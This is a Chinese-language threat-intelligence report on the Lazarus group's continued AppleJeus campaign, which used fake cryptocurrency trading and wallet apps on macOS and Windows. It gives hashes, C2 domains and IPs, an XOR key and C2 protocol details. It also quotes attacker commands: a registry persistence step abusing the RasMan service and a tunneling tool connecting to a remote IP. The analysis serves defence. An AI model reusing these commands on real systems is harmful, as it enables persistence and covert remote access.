lazarus組織是目前最活躍的apt組織之一。 2018年,卡巴斯基針發現由該組織發起的名為applejeus的攻擊行動。該行動是lazarus首次針對macos用戶的攻擊,為了攻擊macos用戶,lazarus開發了macos惡意軟件并添加身份驗證機制,其可以非常仔細謹慎的下載后一階段的有效負載,并在不落盤的情況下加載下一階段的有效負載。為了攻擊windows用戶,他們制定了多階段感染程序。在“ applejeus”行動分析發布后,lazarus在進行攻擊時變得更加謹慎,采用了更多多方法來避免被發現。
AppleJeus后續
發布AppleJeus行動分析后,Lazarus繼續使用類似的作案手法來破壞加密貨幣業務,研究人員發現了更多與AppleJeus中的macOS惡意軟件類似的惡意軟件。 該macOS惡意軟件使用公共代碼來開發安裝程序。 惡意軟件使用了Centrabit開發的qtBitcoinTrader。
這三個macOS安裝程序使用相似的后安裝程序腳本植入有效負載,并在執行獲取的第二階段有效負載時使用相同的命令。此外還識別出的另一類型macOS惡意軟件MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d),該惡意軟件創建于2019-03-12,但網絡通信并未加密,推測這是macOS惡意軟件改造升級的中間階段。
Windows惡意軟件的變化
持續跟蹤此活動中發現一名受害者在2019年3月受到Windows AppleJeus惡意軟件的攻擊。確定感染始于名為WFCUpdater.exe的惡意文件,攻擊者使用了一個假網站:wfcwallet [.] com。
攻擊者像以前一樣使用了多階段感染,但是方法發生了變化。 感染始于.NET惡意軟件,其被偽裝成WFC錢包更新程序(a9e960948fdac81579d3b752e49aceda)。此.NET文件執行后會檢查命令行參數是否為“ / embedding”。 該惡意軟件負責使用硬編碼的20字節XOR密鑰(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)解密同一文件夾中的WFC.cfg文件。其后連接到C2服務器:
wfcwallet.com (resolved ip: 108.174.195.134)www.chainfun365.com(resolved ip: 23.254.217.53)
之后會執行攻擊者的命令,安裝下一階段的有效負載。 攻擊者將兩個文件放置到受害者系統文件夾中:rasext.dll和msctfp.dat。他們使用RasMan(遠程訪問連接管理器)Windows服務注冊下一階段有效負載。 經過基本偵察后,攻擊者使用以下命令手動植入有效載荷:
cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesRasManThirdParty /v DllName /d rasext.dll /f
為了建立遠程隧道,攻擊者使用命令行參數植入了更多的相關工具,但研究人員沒有獲得更多的工具文件。
Port opener:
%APPDATA%LenovodevicecenterDevice.exe 6378
Tunneling tool:
%APPDATA%LenovodevicecenterCenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
macOS惡意軟件變化
JMTTrading
在跟蹤此攻擊活動時發現了macOS惡意軟件變體。攻擊者將其假網站和應用程序稱為JMTTrading,其他研究人員和安全廠商也發布了其大量技術細節。在這里強調一下這次攻擊的不同之處。
攻擊者使用github來托管其惡意應用程序。
惡意軟件作者在其macOS惡意軟件中使用了Object-C而不是QT框架。
該惡意軟件在macOS可執行文件中實現了簡單的后門功能。
與以前的情況類似,使用16字節XOR密鑰加密/解密的惡意軟件。
Windows版本的惡意軟件使用了ADVobfuscator來隱藏其代碼。
macOS惡意軟件的安裝腳本與以前的版本有顯著差異。
UnionCryptoTrader
還確定了另一項針對macOS的攻擊。惡意程序名為UnionCryptoTrader,安全研究員 dineshdina04發現了一個相同的案例,該攻擊總結如下:
安裝腳本與JMTTrading使用的腳本相同。
惡意軟件作者使用swift開發了此macOS惡意軟件。
惡意軟件作者更改了從收集信息的方法。
該惡意軟件開始使用auth_signature和auth_timestamp參數進行身份驗證,以便傳遞第二階段有效負載。
該惡意軟件無需落盤即可加載下一階段的有效負載。
Windows版本的UnionCryptoTrader
研究人員找到了Windows版本的UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)。它是從Telegram Messenger下載并執行:
C:Users[user name]DownloadsTelegram DesktopUnionCryptoTraderSetup.exe
此外在假網站上找到了攻擊者的Telegram,可以高度確認攻擊者使用Telegram Messenger發送安裝程序。由于有效負載僅在內存中執行,因此無法獲取所有相關文件。 整個感染過程與WFCWallet非常相似,但是增加了注入過程。
Windows版本的UnionCryptoTrader具有以下窗口,顯示幾個加密貨幣的價格圖表。
Windows版本的UnionCryptoTrader更新程序(629b9de3e4b84b4a0aa605a3e9471b31)與macOS版本功能相似。 根據構建路徑(Z:Loaderx64ReleaseWinloaderExe.pdb),惡意軟件作者將此惡意軟件稱為加載程序。 啟動后,該惡意軟件會檢索受害者的基本信息,并以http POST發送該信息。
如果C2服務器的響應為200,則惡意軟件會解密有效負載并將其加載到內存中。最后惡意軟件發送act=done。從此加載程序下載的下一階段有效負載(e1953fa319cc11c2f003ad0542bca822)與WFCWallet的.NET下載程序相似。該惡意軟件負責解密同一文件夾中的Adobe.icx文件,將下一個有效負載注入Internet Explorer進程,并執行攻擊者的命令。
最終的有效載荷(dd03c6eb62c9bf9adaf831f1d7adcbab)與WFCWallet相同是通過手動植入的。惡意軟件作者根據先前收集的信息植入僅在特定系統上有效的惡意軟件。該惡意軟件會檢查受感染系統的信息,并將其與給定值進行比較。
Windows惡意軟件將加密的msctfp.dat文件加載到系統文件夾中,并加載每個配置。 它根據該文件的內容執行附加命令。當惡意軟件與C2服務器通信時會使用預定義標頭的POST請求。
初始通信惡意軟件首先發送參數:
cgu:來自配置的64bits十六進制值
aip:配置中的MD5哈希值
sv:硬編碼值
如果來自C2服務器的響應為200,惡意軟件會發送帶有加密數據和隨機值的下一個POST請求,攻擊者使用隨機值來識別每個受害者并驗證POST請求。
imp:隨機產生的值
dsh:imp的異或值
hb_tp:imp的異或值(key:0x67BF32)
hb_dl:加密的數據發送到C2服務器
ct:硬編碼值
最后,惡意軟件下載下一階段的有效負載,對其進行解密。
此外在調查其基礎架構時發現了幾個仍在線的假冒網站。
總結
AppleJeus后續行動中找到幾名受害者分布在英國,波蘭,俄羅斯和中國,一些受害者與加密貨幣業務有關。
攻擊者改變了macOS和Windows惡意軟件,在macOS下載器中添加了身份驗證機制并更改了macOS開發框架。 Windows系統中的感染過程與以前的不同。Lazarus組織為獲取經濟利益而進行攻擊會一直持續。
